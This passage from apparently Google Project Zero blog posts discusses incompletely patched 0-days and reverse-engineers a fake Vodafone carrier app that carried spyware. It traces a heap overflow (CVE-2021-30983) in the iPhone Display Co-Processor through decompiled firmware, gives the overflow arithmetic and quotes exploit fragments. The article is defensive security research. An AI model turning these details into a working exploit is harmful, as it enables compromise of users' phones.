Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn’t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the slides from the talk.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.

This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

 

Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:

  • Root cause analysis

Understanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.

  • Variant analysis

Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.

  • Patch analysis

Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.

  • Exploit technique analysis

Understanding the primitive gained from the vulnerability and how it’s being used. While it’s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn’t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.

Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at this repository. We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.  

The curious tale of a fake Carrier.app

23 June 2022 at 16:01

Posted by Ian Beer, Google Project Zero


NOTE: This issue was CVE-2021-30983 was fixed in iOS 15.2 in December 2021. 


Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:

App splash screen showing the Vodafone carrier logo and the text My Vodafone.

App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodadone app)



Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.


This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.


In collaboration with Project Zero, TAG has published an additional post with more details around the targeting and the actor. The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.

App structure

The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.


Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.


Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.


This blog post is the story of the last exploit and the month-long journey to understand it.

Something's missing? Or am I missing something?

Although all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.


The sixth exploit didn't have anything like that.


Perhaps it could be triggering a kernel logic bug like Linuz Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.


It contained log messages like:


  printf("Failed to prepare fake vtable: 0x%08x", ret);


which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.


Shortly after that was this log message:


  printf("Waiting for R/W primitives...");


Why would you need to wait?


Then shortly after that:


  printf("Memory read/write and callfunc primitives ready!");


Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:


  printf("Unexpected data read from DCP: 0x%08x", v49);

DCP?

In October 2021 Adam Donenfeld tweeted this:


Screenshot of Tweet from @doadam on 11 Oct 2021, which is a retweet from @AmarSaar on 11 October 2021. The tweet from @AmarSaar reads 'So, another IOMFB vulnerability was exploited ITW (15.0.2). I bindiffed the patch and built a POC. And, because it's a great bug, I just finished writing a short blogpost with the tech details, to share this knowledge :) Check it out! https://saaramar.github.io/IOMFB_integer_overflow_poc/' and the retweet from @doadam reads 'This has been moved to the display coprocessor (DCP) starting from 15, at least on iPhone 12 (and most probably other ones as well)'.

DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.


There's little public information about the DCP; the most comprehensive comes from the Asahi linux project which is porting linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:


On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!

https://asahilinux.org/2021/08/progress-report-august-2021/


The Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.

Setting the stage

Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?


Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:

M1 die-shot from techinsights.com with possible location of DCP highlighted.

M1 die-shot from techinsights.com with possible location of DCP added

https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1


Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.


With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.

My kingdom for a .dSYM!

The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:



  Firmware/dcp/iphone13dcp.im4p


The im4p in this case is just a 25 byte header which we can discard:


  $ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1

  $ file iphone13dcp

  iphone13dcp: Mach-O 64-bit preload executable arm64


It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:


  $ nm -a iphone13dcp

  iphone13dcp: no symbols


Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.


Since the firmware images are distributed as .zip files and Apple's servers support range requests with a bit of python and the partialzip tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.


Guess we'll have to do this the hard way!

Day 1; Instruction 1

$ otool -h raw_fw/iphone13dcp

raw_fw/iphone13dcp:

Mach header

magic      cputype   cpusubtype caps filetype ncmds sizeofcmds flags

0xfeedfacf 0x100000C 0          0x00 5        5     2240       0x00000001


That cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.


With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:


A short list of C++ prototypes like IOMFB::UPBlock_ALSS::init(IOMFB::UPPipe *).

The cross-references to those strings look like this:


log(0x40000001LL,

    "UPBlock_ALSS.cpp",

    341,

    "%s: capture buffer exhausted, aborting capture\n",

    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");


This is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.

Object structure

From the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:


ADD  X8, X8, #[email protected] ; "local-iphone13dcp.release"

ADD  X9, X9, #[email protected] ; "RTKit_iOS-1826.40.9.debug"


The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:


struct __cppobj RTKIT_RC_RTTI_BASE

{

  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;

  uint32_t refcnt;

  uint32_t typeid;

};


(These structure definitions are in the format IDA uses for C++-like objects)


The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)


The base type has the following associated vtable:


struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl

{

  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);

};

Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application processor of IOMobileFrameBuffer and AppleCLCD2 the DCP version.


The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.


The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:


IOReturn

IOMobileFramebufferUserClient::s_set_block(

  IOMobileFramebufferUserClient *this,

  void *reference,

  IOExternalMethodArguments *args)

{

  const unsigned __int64 *extra_args;

  u8 *structureInput;

  structureInput = args->structureInput;

  if ( structureInput && args->scalarInputCount >= 2 )

  {

    if ( args->scalarInputCount == 2 )

      extra_args = 0LL;

    else

      extra_args = args->scalarInput + 2;

    return this->framebuffer_ap->set_block_dcp(

             this->task,

             args->scalarInput[0],

             args->scalarInput[1],

             extra_args,

             args->scalarInputCount - 2,

             structureInput,

             args->structureInputSize);

  } else {

    return 0xE00002C2;

  }

}


this unpacks the IOConnectCallMethod arguments and passes them to:


IOMobileFramebufferAP::set_block_dcp(

        IOMobileFramebufferAP *this,

        task *task,

        int first_scalar_input,

        int second_scalar_input,

        const unsigned __int64 *pointer_to_remaining_scalar_inputs,

        unsigned int scalar_input_count_minus_2,

        const unsigned __int8 *struct_input,

        unsigned __int64 struct_input_size)


This method uses some autogenerated code to serialise the external method arguments into a buffer like this:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u64 cntExtraScalars

  u8[] structInput

  u64 CntStructInput

}


which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):


UnifiedPipeline2::rpc(

      'A435',

      arg_struct,

      0x105Cu,

      &retval_buf,

      4u);


UnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.


AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.


Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.

Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called ​​rpc_callee_gated - quite likely that's the receive side of the function rpc_caller_gated we saw earlier.


rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:


      switch ( rpc_id )

      {

        case 'A000':

          goto LABEL_146;

        case 'A001':

          handler_fptr = callback_handler_A001;

          break;

        case 'A002':

          handler_fptr = callback_handler_A002;

          break;

        case 'A003':

          handler_fptr = callback_handler_A003;

          break;

        case 'A004':

          handler_fptr = callback_handler_A004;

          break;

        case 'A005':

          handler_fptr = callback_handler_A005;

          break;


At the the bottom of this switch statement is the invocation of the callback handler:


ret = handler_fptr(

          meta,

          in_struct_ptr,

          in_struct_size,

          out_struct_ptr,

          out_struct_size);


in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialized earlier on the application processor:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u32 cntExtraScalars

  u8[] structInput

  u64 cntStructInput

}


The callback unpacks that buffer and calls a C++ virtual function:


unsigned int

callback_handler_A435(

  u8* meta,

  void *args,

  uint32_t args_size,

  void *out_struct_ptr,

  uint32_t out_struct_size

{

  int64 instance_id;

  uint64_t instance;

  int err;

  int retval;

  unsigned int result;

  instance_id = meta->instance_id;

  instance =

    global_instance_table[instance_id].IOMobileFramebufferType;

  if ( !instance ) {

    log_fatal(

      "IOMFB: %s: no instance for instance ID: %u\n",

      "static T *IOMFB::InstanceTracker::instance"

        "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"

        " [T = IOMobileFramebuffer]",

      instance_id);

  }

  err = (instance-16)->vtable_0x378( // virtual call

         (instance-16),

         args->task,

         args->scalar_input_0,

         args->scalar_input_1,

         args->remaining_scalar_inputs,

         args->cntExtraScalars,

         args->structInput,

         args->cntStructInput);

  retval = convert_error(err);

  result = 0;

  *(_DWORD *)out_struct_ptr = retval;

  return result;

}


The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint and whilst emulating the firmware is probably possible that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large so just go through all those vtables, decompile them and see if the prototypes look reasonable!


There's one clear match in the vtable for the UNPI type:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)


Here's my reversed implementation of UNPI::set_block

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)

{

  struct block_handler_holder *holder;

  struct metadispatcher metadisp;

  if ( second_scalar_input )

    return 0x80000001LL;

  holder = this->UPPipeDCP_H13P->block_handler_holders;

  if ( !holder )

    return 0x8000000BLL;

  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;

  metadisp.handlers_holder = holder;

  metadisp.structure_input_buffer = structure_input_buffer;

  metadisp.structure_input_size = structure_input_size;

  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;

  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;

  metadisp.some_flags = 0x40000000LL;

  metadisp.dispatcher_fptr = a_dispatcher;

  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;

  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);

}


This method wraps up the arguments into another structure I've called metadispatcher:


struct __attribute__((aligned(8))) metadispatcher

{

 uint64_t address_of_some_zerofill_static_buffer;

 uint64_t some_flags;

 __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);

 uint64_t offset_of_something_which_looks_serialization_related;

 struct block_handler_holder *handlers_holder;

 uint64_t structure_input_buffer;

 uint64_t structure_input_size;

 uint64_t remaining_scalar_inputs;

 uint32_t cnt_remaining_sclar_input;

};


That metadispatcher object is then passed to this method:


return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);


In there we reach this code:


  block_type_handler = lookup_a_handler_for_block_type_and_subtype(

                         a1,

                         first_scalar_input, // block_type

                         a3);                // subtype


The exploit calls this set_block external method twice, passing two different values for first_scalar_input, 7 and 19. Here we can see that those correspond to looking up two different block handler objects here.


The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:


add_handler_for_block_type(struct block_handler_holder *handler_list,

                           struct BlockHandler *handler)

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:


struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE

{

  uint64_t field_16;

  struct handler_inner_types_entry *inner_types_array;

  uint32_t n_inner_types_array_entries;

  uint32_t field_36;

  uint8_t can_run_without_commandgate;

  uint32_t block_type;

  uint64_t list_link;

  uint64_t list_other_link;

  uint32_t some_other_type_field;

  uint32_t some_other_type_field2;

  uint32_t expected_structure_io_size;

  uint32_t field_76;

  uint64_t getBlock_Impl;

  uint64_t setBlock_Impl;

  uint64_t field_96;

  uint64_t back_ptr_to_UPPipeDCP_H13P;

};


The RTTI type is BLHA (BLock HAndler.)


For example, here's the codepath which builds and registers block handler type 24:


BLHA_24 = (struct BlockHandler *)CXXnew(112LL);

BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;

BLHA_24->block_type = 24;

BLHA_24->refcnt = 1;

BLHA_24->can_run_without_commandgate = 0;

BLHA_24->some_other_type_field = 0LL;

BLHA_24->expected_structure_io_size = 0xD20;

typeid = typeid_BLHA();

BLHA_24->typeid = typeid;

modify_typeid_ref(typeid, 1);

BLHA_24->__vftable = vtable_BLHA_subclass_type_24;

BLHA_24->inner_types_array = 0LL;

BLHA_24->n_inner_types_array_entries = 0;

BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;

BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;

BLHA_24->field_96 = 0LL;

BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;

add_handler_for_block_type(list_holder, BLHA_24);


Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.


We can go through all the callsites which add block handlers; tell IDA the type of the arguments and name all the getBlock and setBlock implementations:


The IDA Pro Names window showing a list of symbols like BLHA_15_getBlock_Impl.

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.


There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:


<2, 0, 0x5F8, 0x600>


The first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:


return wrap_MemoryDescriptor::withAddressRange(

  *(void*)(structure_input_buffer + addr_offset),

  *(unsigned int *)(structure_input_buffer + size_offset),

  caller_task_ptr);


We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:


make_link_call('D453', &req, 0x20, &resp, 0x14);


which corresponds to a call to this method on the AP side:


IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)


The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:


a_descriptor_with_controlled_stuff->dispatcher_fptr(

  a_descriptor_with_controlled_stuff,

  block_type_handler,

  important_ptr,

  important_size);


where the dispatcher_fptr looks like this:


a_dispatcher(

        struct metadispatcher *disp,

        struct BlockHandler *block_handler,

        __int64 controlled_ptr,

        unsigned int controlled_size)

{

  return block_handler->BlockHandler_setBlock(

           block_handler,

           disp->structure_input_buffer,

           disp->structure_input_size,

           disp->remaining_scalar_inputs,

           disp->cnt_remaining_sclar_input,

           disp->handlers_holder->gate,

           controlled_ptr,

           controlled_size);

}


You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.


BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:


BlockHandler19::setBlock(

  struct BlockHandler *this,

  void *structure_input_buffer,

  int64 structure_input_size,

  int64 *remaining_scalar_inputs,

  unsigned int cnt_remaining_scalar_inputs,

  struct CommandGate *gate,

  void* mapped_mdesc_ptr,

  unsigned int mapped_mdesc_length)


This uses a Command Gate (GATI) object (like a call gate in IOKit to serialise calls) to finally get close to actually calling the setBlock_Impl function.


We need to reverse the gate_context structure to follow the controlled data through the gate:


struct __attribute__((aligned(8))) gate_context

{

 struct BlockHandler *the_target_this;

 uint64_t structure_input_buffer;

 void *remaining_scalar_inputs;

 uint32_t cnt_remaining_scalar_inputs;

 uint32_t field_28;

 uint64_t controlled_ptr;

 uint32_t controlled_length;

};


The callgate object uses that context object to finally call the BLHA setBlock handler:


callback_used_by_callgate_in_block_19_setBlock(

  struct UnifiedPipeline *parent_pipeline,

  struct gate_context *context,

  int64 a3,

  int64 a4,

  int64 a5)

{

  return context->the_target_this->setBlock_Impl)(

           context->the_target_this->back_ptr_to_UPPipeDCP_H13P,

           context->structure_input_buffer,

           context->remaining_scalar_inputs,

           context->cnt_remaining_scalar_inputs,

           context->controlled_ptr,

           context->controlled_length);

}

SetBlock_Impl

And finally we've made it through the whole callstack following the controlled data from IOConnectCallMethod in userspace on the AP to the setBlock_Impl methods on the DCP!


The prototype of the setBlock_Impl methods looks like this:


setBlock_Impl(struct UPPipeDCP_H13P *pipe_parent,

              void *structure_input_buffer,

              int *remaining_scalar_inputs,

              int cnt_remaining_scalar_inputs,

              void* ptr_via_memdesc,

              unsigned int len_of_memdesc_mapped_buf)


The exploit calls two setBlock_Impl methods; 7 and 19. 7 is fairly simple and seems to just be used to put controlled data in a known location. 19 is the buggy one. From the log strings we can tell that block type 19 handler is implemented in a file called UniformityCompensator.cpp.


Uniformity Compensation is a way to correct for inconsistencies in brightness and colour reproduction across a display panel. Block type 19 sets and gets a data structure containing this correction information. The setBlock_Impl method calls UniformityCompensator::set and reaches the following code snippet where controlled_size is a fully-controlled u32 value read from the structure input and indirect_buffer_ptr points to the mapped buffer, the contents of which are also controlled:

uint8_t* pages = compensator->inline_buffer; // +0x24

for (int pg_cnt = 0; pg_cnt < 3; pg_cnt++) {

  uint8_t* this_page = pages;

  for (int i = 0; i < controlled_size; i++) {

    memcpy(this_page, indirect_buffer_ptr, 4 * controlled_size);

    indirect_buffer_ptr += 4 * controlled_size;

    this_page += 0x100;

  }

  pages += 0x4000;

}

There's a distinct lack of bounds checking on controlled_size. Based on the structure of the code it looks like it should be restricted to be less than or equal to 64 (as that would result in the input being completely copied to the output buffer.) The compensator->inline_buffer buffer is inline in the compensator object. The structure of the code makes it look that that buffer is probably 0xc000 (three 16k pages) large. To verify this we need to find the allocation site of this compensator object.


It's read from the pipe_parent object and we know that at this point pipe_parent is a UPPipeDCP_H13P object.


There's only one write to that field, here in UPPipeDCP_H13P::setup_tunables_base_target:


compensator = CXXnew(0xC608LL);

...

this->compensator = compensator;


The compensator object is a 0xc608 byte allocation; the 0xc000 sized buffer starts at offset 0x24 so the allocation has enough space for 0xc608-0x24=0xC5E4 bytes before corrupting neighbouring objects.


The structure input provided by the exploit for the block handler 19 setBlock call looks like this:


struct_input_for_block_handler_19[0x5F4] = 70; // controlled_size

struct_input_for_block_handler_19[0x5F8] = address;

struct_input_for_block_handler_19[0x600] = a_size;


This leads to a value of 70 (0x46) for controlled_size in the UniformityCompensator::set snippet shown earlier. (0x5f8 and 0x600 correspond to the offsets we saw earlier in the subtype's table:  <2, 0, 0x5F8, 0x600>)


The inner loop increments the destination pointer by 0x100 each iteration so 0x46 loop iterations will write 0x4618 bytes.


The outer loop writes to three subsequent 0x4000 byte blocks so the third (final) iteration starts writing at 0x24 + 0x8000 and writes a total of 0x4618 bytes, meaning the object would need to be 0xC63C bytes; but we can see that it's only 0xc608, meaning that it will overflow the allocation size by 0x34 bytes. The RTKit malloc implementation looks like it adds 8 bytes of metadata to each allocation so the next object starts at 0xc610.


How much input is consumed? The input is fully consumed with no "rewinding" so it's 3*0x46*0x46*4 = 0xe5b0 bytes. Working backwards from the end of that buffer we know that the final 0x34 bytes of it go off the end of the 0xc608 allocation which means +0xe57c in the input buffer will be the first byte which corrupts the 8 metadata bytes and +0x8584 will be the first byte to corrupt the next object:


A diagram showing that the end of the overflower object overlaps with the metadata and start of the target object.

This matches up exactly with the overflow object which the exploit builds:


  v24 = address + 0xE584;

  v25 = *(_DWORD *)&v54[48];

  v26 = *(_OWORD *)&v54[32];

  v27 = *(_OWORD *)&v54[16];

  *(_OWORD *)(address + 0xE584) = *(_OWORD *)v54;

  *(_OWORD *)(v24 + 16) = v27;

  *(_OWORD *)(v24 + 32) = v26;

  *(_DWORD *)(v24 + 48) = v25;


The destination object seems to be allocated very early and the DCP RTKit environment appears to be very deterministic with no ASLR. Almost certainly they are attempting to corrupt a neighbouring C++ object with a fake vtable pointer.


Unfortunately for our analysis the trail goes cold here and we can't fully recreate the rest of the exploit. The bytes for the fake DCP C++ object are read from a file in the app's temporary directory (base64 encoded inside a JSON file under the exploit_struct_offsets key) and I don't have a copy of that file. But based on the flow of the rest of the exploit it's pretty clear what happens next:

sudo make me a DART mapping

The DCP, like other coprocessors on iPhone, sits behind a DART (Device Address Resolution Table.) This is like an SMMU (IOMMU in the x86 world) which forces an extra layer of physical address lookup between the DCP and physical memory. DART was covered in great detail in Gal Beniamini's Over The Air - Vol. 2, Pt. 3 blog post.


The DCP clearly needs to access lots of buffers owned by userspace tasks as well as memory managed by the kernel. To do this the DCP makes RPC calls back to the AP which modifies the DART entries accordingly. This appears to be exactly what the DCP exploit does: the D45X family of DCP->AP RPC methods appear to expose an interface for requesting arbitrary physical as well as virtual addresses to be mapped into the DCP DART.


The fake C++ object is most likely a stub which makes such calls on behalf of the exploit, allowing the exploit to read and write kernel memory.

Conclusions

Segmentation and isolation are in general a positive thing when it comes to security. However, splitting up an existing system into separate, intercommunicating parts can end up exposing unexpected code in unexpected ways.


We've had discussions within Project Zero about whether this DCP vulnerability is interesting at all. After all, if the UniformityCompensator code was going to be running on the Application Processors anyway then the Display Co-Processor didn't really introduce or cause this bug.


Whilst that's true, it's also the case that the DCP certainly made exploitation of this bug significantly easier and more reliable than it would have been on the AP. Apple has invested heavily in memory corruption mitigations over the last few years, so moving an attack surface from a "mitigation heavy" environment to a "mitigation light" one is a regression in that sense.


Another perspective is that the DCP just isn't isolated enough; perhaps the intention was to try to isolate the code on the DCP such that even if it's compromised it's limited in the effect it could have on the entire system. For example, there might be models where the DCP to AP RPC interface is much more restricted.


But again there's a tradeoff: the more restrictive the RPC API, the more the DCP code has to be refactored - a significant investment. Currently, the codebase relies on being able to map arbitrary memory and the API involves passing userspace pointers back and forth.


I've discussed in recent posts how attackers tend to be ahead of the curve. As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too. We saw that in the logic-bug sandbox escape used by NSO and we see that here in this memory-corruption-based privilege escalation that side-stepped kernel mitigations by corrupting memory on a co-processor instead. Both are quite likely to continue working in some form in a post-memory tagging world. Both reveal the stunning depth of attack surface available to the motivated attacker. And both show that defensive security research still has a lot of work to do.

